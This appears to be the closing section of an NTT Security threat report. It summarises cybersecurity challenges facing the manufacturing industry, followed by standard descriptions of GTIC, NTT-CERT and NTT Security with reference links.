Even without the looming threat of increased attack volumes, the manufacturing industry faces a variety of security challenges in its ongoing evolution. With more technology and connectivity continually being introduced into the industry, manufacturing is quickly becoming a high-value target for cybercriminals. While not typically thought of as highly 'attackable,' manufacturing has been one of the most consistently attacked industries over the past several years, and was the most targeted industry in Q2 ’17. In addition to potential threats unique to the manufacturers, the industry also faces a variety of threats, prevalent across many industries, including insider and technical threats.

The tactics of cybercriminals will continue to evolve, as does the technology available to them. That being said, many threat actors continue to use tried and true methods (e.g., unpatched vulnerabilities), with many organizations failing to properly secure these attack vectors – a lesson many organizations learn the hard way.
About GTIC
The NTT Security GTIC protects and informs NTT Security clients through security threat research, vulnerability analysis and the development of effective countermeasures. For more information, including vulnerability disclosures [18] and threat reports [19], visit the research page on www.nttsecurity.com, our blog [20] or download related white papers [21].

About NTT-CERT
NTT-CERT, a division of NTT Secure Platform Laboratories, serves as a trusted point of contact for Computer Security Incident Response Team (CSIRT) specialists, and provides full-range CSIRT services within NTT. NTT-CERT generates original intelligence regarding cybersecurity threats, helping to enhance NTT companies' capabilities in the security services and secure network services fields. To learn more about NTT-CERT, please visit www.ntt-cert.org [22].

About NTT Security
NTT Security is the specialized security company of NTT Group. With embedded security, we enable Group companies (Dimension Data, NTT Communications and NTT DATA) to deliver resilient business solutions for clients’ digital transformation needs. NTT Security has 10 SOCs, seven R&D centers, over 1,500 security experts and handles hundreds of thousands of security incidents annually across six continents.

NTT Security ensures that resources are used effectively by delivering the right mix of consulting and managed services for NTT Group companies – making best use of local resources and leveraging our global capabilities. NTT Security is part of the NTT Group (Nippon Telegraph and Telephone Corporation), one of the largest ICT companies in the world. Visit nttsecurity.com to learn more.

[18] https://www.solutionary.com/threat-intelligence/vulnerability-disclosures/
[19] https://www.solutionary.com/threat-intelligence/threat-reports/
[20] http://www.solutionary.com/resource-center/blog/
[21] http://www.solutionary.com/resource-center/white-papers/
[22] http://www.ntt-cert.org